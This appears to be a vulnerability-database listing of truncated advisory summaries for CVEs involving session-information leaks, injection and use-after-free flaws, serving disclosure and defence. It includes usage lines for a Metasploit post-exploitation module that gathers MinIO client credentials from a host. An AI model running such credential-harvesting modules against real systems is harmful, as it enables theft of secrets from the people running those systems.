CVE-2019-10528

Use after free issue in kernel while accessing freed mdlog session info and its attributes after closing the session in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9206,...

CVE-2024-45799

Affected software: FluxCP web-based control panel for rAthena servers. Vulnerability: JavaScript injection via un sanitised content on venders/buyers list pages and shop names. Root cause / how it works: Unsanitised data in the shop-related pages allows injecting arbitrary JavaScript code that is...

CVE-2024-45799 Javascript Injection in Vending Info/Buyers Info Module in FluxCP

FluxCP is a web-based Control Panel for rAthena servers written in PHP. A javascript injection is possible via venders/buyers list pages and shop names, that are currently not sanitized. This allows executing arbitrary javascript code on the user's browser just by visiting the shop pages. As a...

Information disclosure

Rails is a web-application framework. Starting with version 5.2.0, there is a possible sensitive session information leak in Active Storage. By default, Active Storage sends a Set-Cookie header along with the user's session cookie when serving blobs. It also sets Cache-Control to public. Certain...

Gather MinIO Client Key

This module searches for MinIO Client credentials on a Windows host. Module Options msf use post/multi/gather/minioclient msf postminioclient show actions ...actions... msf postminioclient set ACTION msf postminioclient show options ...show and set options... msf postminioclient run This module...

AZL-37005 CVE-2021-3738 affecting package samba for versions less than 4.18.3-1

In DCE/RPC it is possible to share the handles cookies for resource state between multiple connections via a mechanism called 'association groups'. These handles can reference connections to our sam.ldb database. However while the database was correctly shared, the user credentials state was only...

GHSA-GFP2-W5JM-955Q OMERO.web exposes some unnecessary session information in the page

Background OMERO.web loads various information about the current user such as their id, name and the groups they are in, and these are available on the main webclient pages. Some additional information being loaded is not used by the webclient and is being removed in this release. Impact OMERO.we...

Information disclosure

RSA Archer versions, prior to 6.5 SP1, contain an information exposure vulnerability. Users' session information is logged in plain text in the RSA Archer log files. An authenticated malicious local user with access to the log files may obtain the exposed information to use it in further attacks...

CVE-2012-0328

Janetter before 3.3.0.0 aka 3.3.0 allows remote attackers to obtain session information for twitter.com web sites via unspecified vectors...

WordPress 3.0.4 stored XSS-vulnerability warning-the black bar safety net

WordPress is a PHP language development of the popular blogging platform, WordPress 3.0.4 treatment comments the presence of the storage typeXSSvulnerabilities, successful exploitation of the vulnerability could lead to session information leakage, which may lead to elevation of privileges. In...

CVE-2009-1214

CVE-2009-1214 affects GNU screen 4.0.3, which creates the /tmp/screen-exchange temporary file with world-readable permissions, enabling local users to potentially obtain sensitive session information (confidentiality impact: COMPLETE). The issue is local, due to permissive file mode, and is corro...

CVE-2005-2149

config.php in Cacti 0.8.6e and earlier allows remote attackers to set the nohttpheaders switch, then modify session information to gain privileges and disable the use of addslashes to conduct SQL injection attacks...